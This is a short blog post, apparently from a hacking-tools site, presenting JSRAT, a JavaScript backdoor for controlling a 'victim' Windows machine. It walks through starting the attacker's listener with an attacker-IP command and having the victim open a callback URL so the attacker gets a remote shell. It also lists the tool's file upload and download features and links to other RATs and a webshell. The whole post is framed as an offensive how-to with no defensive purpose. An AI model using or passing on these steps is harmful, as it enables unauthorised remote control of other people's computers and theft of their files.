JSRAT - Javascript Backdoor to Control Victim Machine - Haxf4rall

JSRAT – Javascript Backdoor to Control Victim Machine

January 14, 2018July 27, 2019 Comments Off

JSRAT is a python Script that can be used to get a remote shell of victim pc.

Installation & Setup :-

Download the JSRAT tool Here

Download and give appropriate permission to execute the script.Above figure shows the complete installation

Starting the web server:

Run and execute the command: python JSRAT.py -i <kali Linux or Attacker Ip> -p 8080

JSRAT provides the list of URLs.Copy the Client command here it is http://192.168.172.143:8080/wtf

VICTIM MACHINE:-

Open this Client command URL with Victim browser

To gain the shell payload generated by URL should be opened with CMD.

Once the command is executed a shell will be obtained.

BACK TO ATTACKERS MACHINE:-

Here we go !!! We have connected to Victim machine

Let us try some windows command: Ipconfig

Above Figure shows executing the command calc opens up the windows calculator.JSRat can also provide upload, Read and Download files.

Related Articles

SecurityNotFound – 404 Page Not Found Webshell

September 30, 2019

AsyncRAT – Open-Source Remote Administration Tool For Windows

August 24, 2019

Koadic – C3 COM Command & Control – JScript RAT

July 24, 2019July 23, 2019